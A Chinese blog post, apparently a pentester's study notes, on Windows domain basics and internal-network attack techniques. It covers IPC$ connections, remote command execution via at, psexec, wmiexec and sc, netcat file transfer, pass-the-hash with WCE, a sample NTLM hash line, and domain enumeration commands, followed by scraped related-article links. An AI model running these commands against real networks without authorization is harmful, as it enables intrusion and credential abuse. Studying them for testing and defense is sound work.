之前写过一篇内网当中域渗透的简单文章。好久没遇到忘得差不多了。前几天做项目,正好碰到了域环境,正好有时间,再回顾一下原来的知识,另外把新补充的知识再记录一下。

域相关知识

什么是域

域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。
域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者管理其他的域,每个域都有自己的安全策略,以及它与其他域的安全信任关系。
如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows域。

域相关概念

活动目录是由组织单元、域(domain)、域树(tree)、森林(forest)构成的层次结构。作为最基本的管理单元,同时也是最基层的容器,它可以对员工、计算机等基本数据进行存储。在一个活动目录中可以根据需要建立多个域,比方说“甲公司”的财务科、人事科、销售科就可以各建一个域,因为这几个域同属甲公司,所以就可以将这几个域构成一棵域树并交给域树管理,这棵域树就是甲公司。又因为,甲公司、乙公司、丙公司都归属A集团,那么为了让A集团可以更好地管理这三家子公司,就可以将这三家公司的域树集中起来组成域森林(即A集团)。因此A集团可以按“子公司(域树)→部门→员工”的方式进行层次分明的管理。活动目录这种层次结构使企业网络具有极强的扩展性,便于组织、管理以及目录定位。

域的搭建过程

域控制器安装(win server系统)

先安装一个DNS——安装active directory(注:装这两个都需要系统光盘或镜像;安装active directory时相关的信息选择和命令要按自己的需求来)

装好后开始——管理工具,打开active directory用户和计算机——新建用户(密码选永不过期)——在域中设置委派控制(对象为前面建的用户)——完成域控制器就建好了

电脑加入域

设置成与域控制器在同一个网段,然后右击“我的电脑”——属性——计算机名——更改——选“域”然后输入你建的域的域名重启就行了(注:这台电脑的计算机名要先在添加到域控制器中去)

参考:

> AD域环境的搭建 基于Server 2008 R2: http://www.it165.net/os/html/201306/5493.html

> Acitve Directory 域环境的搭建: http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html

什么是ipc$连接

ipc$概念

IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

ipc$的作用

利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。

ipc$的利用条件

(1)139、445端口开启

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.、

(2)管理员开启了默认共享

默认共享是为了方便管理员远程管理而默认开启的共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问。

ipc连接失败的原因

  • 你的系统不是NT或以上操作系统.
  • 对方没有打开ipc$默认共享。
  • 不能成功连接目标的139,445端口.
  • 命令输入错误.
  • 用户名或密码错误.

常见错误号:

  • 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
  • 错误号51,Windows 无法找到网络路径 : 网络有问题;
  • 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
  • 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
  • 错误号1326,未知的用户名或错误密码 : 原因很明显了;
  • 错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
  • 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

域内的文件操作

利用IPC$

建立ipc$连接以后,就可以访问目标机器的文件(上传、下载),也可以在目标机器上运行命令。

上传和下载文件直接通过copy命令就可以,不过路径换成UNC路径。

何为UNC路径?简单来讲以\开头的路径就是UNC路径,比如\192.168.1.2\c$\boot.ini。

如果要从本地当前目录上传1.bat到192.168.1.2机器C盘根目录下,那么命令就是
copy 1.bat \\192.168.1.2\C$\

反之就是下载。dir、copy、xcopy、move、type的参数都可以使用UNC路径。

利用Telnet

服务端:nc -lvp 23 < nc.exe

下载端:telnet ip -f c:\nc.exe

利用文件共享

映射目标
net use x: \\[目标IP]\[地址] [域用户password] /user:[域]\[username]

域内运行命令

利用计划任务

at \\192.168.200.100 15:00 c:\hack.bat

psexec

psexec针对远程建立连接的认证方式有两种,一种先建立ipc连接,然后直接用psexec \192.168.200.100 cmd命令开启一个半交互式的cmdshell,另一种是在psexec的参数中指定账号密码。
参数:

> -s 参数用来以system权限执行
>
> –accepteula 绕过第一次运行的弹窗
>
> -c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)
>
> -d 不等待程序执行完就返回

psexec \\192.168.1.2 c:\hack.bat

wmiexec

T00ls大牛写的一款工具。早就传开了。
半交互模式:
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password

单个命令执行的模式:
cscript.exe wmiexec.vbs /cmd 192.168.1.1 username password &quot;command&quot;

如果有时候我们抓取到的是hash,破解不了时可以利用WCE的hash注入,然后再执行WMIEXEC(不提供账号密码)就可以了。

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1
wce -s [hash]
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1

SC创建服务执行

1、系统权限(其中test为服务名)
sc \\DC1 create test binpath= c:\cmd.exe
sc \\DC1 start test
sc \\DC1 delete test2.指定用户权限启动
sc \\DC1 create test binpath = "c:\1.exe" obj= "centoso\administrator" passwrod= test
sc \\DC1 start test

hash相关知识

windows的密码是经过hash后存储的,本地存在sam,system注册表中,域里面存在ntds.dit中。密码hash有两种格式,LM hash和NT hash。

| 2000 | xp | 2003 | Vista | win7 | 2008 | 2012 |

前面三个默认是LM hash,当密码超过14位时候会采用NTLM加密

test:1003:E52CAC67419A9A22664345140A852F61:67A54E1C9058FCA16498061B96863248:::

前一部分是LM Hash,后一部分是NTLM Hash 当LM Hash是AAD3B435B51404EEAAD3B435B51404EE 这表示空密码或者是未使用LM_HASH

LMhash可以用在线网站秒破: http://www.objectif-securite.ch/en/ophcrack.php

判定是否在域内

拿下内网当中的一台主机后,首先要判断所控主机是否在域内。这里记录集中验证的方法。

net time /domain

  • 存在域不确定,但当前用户不是域用户。
      

  • 存在域,且当前用户是域用户会从域控返回当前时间。
      

  • 不存在域。
      

net config workstation

systeminfo

ipconfig /all

域内信息收集

  • net user /domain 查看域用户
      
  • net view /domain 查看有几个域
  • net view /domain:XXX 查看此域内电脑
      
  • net group /domain 查询域里面的组
      
  • net group “domain computers” /domain 查看加入到域内的所有计算机名
      
  • net group “domain admins” /domain 查看域管理员
      
  • net group “domain controllers” /domain 查看域控制器
      
  • net user hacker /domain 获得指定账户的详细信息
      
  • net accounts /domain 获得域密码策略设置,密码长短,错误锁定等信息
      

以上命令都是最简单的获取信息命令,只能获取最基本的信息。

更详细的信息需要用到其他的工具和利用姿势。以后再慢慢写。

本地用户与域用户

拿到一台主机权限后,有两种可能:

本地用户

域用用户

一般本地用户的administrator可以直接提升为ntauthority\system,SYSTEM用户权限。

在这三种情况中,本地用户是无法运行之前说的所有命令的,因为本质上所有查询都是通过ldap协议去域控制器上查询,这个查询需要经 过权限认证,只有域用户才有这个权限。当域用户运行查询命令时,会自动使用kerberos协议认证,无需额外输入账号密码。SYSTEM用户的情况比较特殊,在域中,除了普通用户外,所有机器都有一个机器用户,用户名是机器名后加$,本 质上机器上的SYSTEM用户对应的就是域里面的机器用户,所以SYSTEM权限是可以运行之前说的查询命令的。

1、域渗透基础简单信息收集相关推荐

  1. 渗透测试-域环境下的信息收集

    域环境下的信息收集 常规信息类收集,应用.服务.权限 用户信息收集 系统信息收集 其他信息收集 自动信息收集 MSF自动收集信息 CS自动信息收集插件 架构信息类收集-网络.用户.域控 网络信息收集 ...

  2. 渗透测试中信息收集的那些事

    渗透测试中信息收集的那些事 转载自:TideSec(知名安全团队)--VllTomFord(大佬)------https://www.cnblogs.com/OpenCyberSec/p/107941 ...

  3. 域渗透基础之NTLM认证协议

    域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...

  4. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  5. 内网渗透学习-Windows信息收集

    内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...

  6. 内网渗透-内网信息收集

    内网信息收集 文章目录 内网信息收集 前言 msf模块中的信息收集 msf反弹shell后的信息收集 内网信息收集 后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们 ...

  7. Kali渗透测试之被动信息收集

    一.渗透测试的流程 信息收集(很重要,时间占比30% ~ 50%) 漏洞扫描 漏洞利用 提权 清除痕迹,留后门 写渗透测试报告 其中信息收集很重要,它通常占整个渗透测试过程所需时间的30% ~ 50% ...

  8. 域渗透基础_域渗透实战下gpo策略利用

    计划任务 每次需要删除计划的配置文件 ,更改任务名 重新下发文件,计划任务的文件路径放在sysvol目录下,域渗透实战下gpo策略利用. startup 重启登录 文件必须放在 gpo配置的指定目录下 ...

  9. 在线渗透测试网址信息收集网站-密码工具-漏洞查找平台-安全视频平台

    在线渗透测试网址信息收集网站 http://tool.chinaz.com/nslookup/ - 在线NSLOOKUP http://whois.chinaz.com/- 站长工具:whois ht ...

最新文章

  1. python怎么读取列表-详解Python如何获取列表(List)的中位数
  2. 广东省计算机媒体大赛,广东省大学生计算机设计大赛
  3. 手机modem开发(5)---LTE基本架构
  4. ucc编译器(x86移植)
  5. LeetCode 208. Implement Trie (Prefix Tree)
  6. python爬虫获取网易云音乐歌单
  7. 帆软报表(多sheet)自定义分页查询
  8. 清华大学计算机杜瑜皓,立足改革、多元择优为清华选拔有理想有才能的优秀学子-清华大学新闻网...
  9. ubuntu14.04拒绝winscp的连接请求问题的解决笔记
  10. dhuacm出题网站搭建
  11. 数独游戏代码C++解法
  12. 薄胶(S18xx,SPR955,BCI-3511,NRD6015)光刻胶
  13. charles连接不上手机
  14. h3c 抓包么 能通过debug_H3C debugging 使用技巧
  15. 设备接入ONENET(2)STM32 + ESP8266(MQTT协议)接入云 :使用 OneNET 官方麒麟座开发板例程
  16. Visual Studio 2019 设置背景图
  17. LINUX-SHELL基础
  18. chrome浏览器使用方法介绍
  19. android studio listview点击事件,android如何响应listview上不同按钮点击事件
  20. 从谷歌创始人的公开信中所学到的

热门文章

  1. 网络安全——HTTP头部注入
  2. UWP WP8.1 依赖属性和用户控件 依赖属性简单使用 uwp添加UserControl
  3. 第1章 决策树算法及其在商品购买行为预测的应用
  4. 创建ESXi 6.7安装程序USB闪存盘的前3个免费工具
  5. 如何在Word文档中插入一条分隔线?
  6. 2000-2018年286个地级市PM2.5数据
  7. 使用python 将excel中数据批量生成word周报
  8. 【数值预测案例】(5) LSTM 时间序列气温数据预测,附TensorFlow完整代码
  9. UOS系统工程师第十期真题
  10. 计算机防勒索病毒之系统主机加固篇